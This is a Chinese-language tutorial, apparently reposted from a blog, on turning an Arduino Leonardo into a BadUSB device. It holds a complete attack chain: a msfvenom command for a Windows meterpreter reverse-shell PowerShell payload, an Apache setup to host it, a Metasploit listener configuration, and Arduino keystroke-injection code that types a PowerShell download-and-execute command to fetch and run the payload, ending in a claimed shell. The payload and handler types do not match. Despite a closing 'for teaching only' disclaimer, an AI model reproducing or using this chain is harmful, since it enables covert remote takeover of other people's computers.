安装Arduino IDE
arduino ide是一款专业的arduino开发工具，主要用于arduino程序的编写和开发，拥有开放源代码的电路图设计、支持ISP在线烧，同时支持Flash、Max/Msp、VVVV、PD、C、Processing等多种程序兼容的特点

首先，官网下载Arduino IDE

下载好后进行安装，将badusb连接主机，配置环境

0x03 利用msf生成windows端木马
在msf中输入以下命令生成木马

msfvenom -p windows/x64/meterpreter_reverse_http LHOST= LPORT= -f psh > 1.ps1
1

启动Apache2，将生成的1.ps1复制到/var/www/html中

service apache2 start
sudo cp 1.ps1 /var/www/html
1
2

进入监听模式

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp set LHOST 172.16.7.130
set LPORT 4321
run
1
2
3
4

0x04 烧录
可以取得开发板信息确定是否连接

在工具中选择开发板：ArduinoLeonardo
选择合适的端口
编程器选择：USBasp

当写入代码后，首先点击第一个按钮进行验证，当显示编译完成则可点击上传进行烧录

代码的编写我们可以借助Automator_2.0.1这款辅助软件，编写代码更加方便
软件：https://github.com/Catboy96/Automator

代码格式介绍：

setup() 函数
用来初始化变量、Pin模式、开始使用库等
每次打开或重置Arduino板后，setup（）函数将只运行一次

loop() 函数
精确地执行其名称所建议的操作，并连续循环，从而允许程序更改和响应

//参考代码：

include<Keyboard.h> //包含键盘模块头文件

void setup(){ //初始化
Keyboard.begin();//开始键盘通信
delay(1000);//延时1000毫秒，
Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键
Keyboard.press('r');//按下r键 CMD
delay(500);
Keyboard.release(KEY_LEFT_GUI);//松掉win键
Keyboard.release('r');//松掉r键
delay(500);
Keyboard.println("powershell IEX (New-Object Net.WebClient).DownloadString('http://XXX.XXX.XXX.XXX/1.ps1')");
Keyboard.press(KEY_RETURN); //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500);
Keyboard.end();//结束键盘通讯
}
void loop()//循环，这里的代码
{
//循环体
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
0x05 测试
将烧录好的badusb插入目标主机后，目标主机会自动按下“win+r”键，并自动输入：
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://172.16.7.130/1.ps1’)
拿shell成功!

本文章只用于教学，切勿用于非法用途
原文链接：https://blog.csdn.net/weixin_43211186/article/details/103870727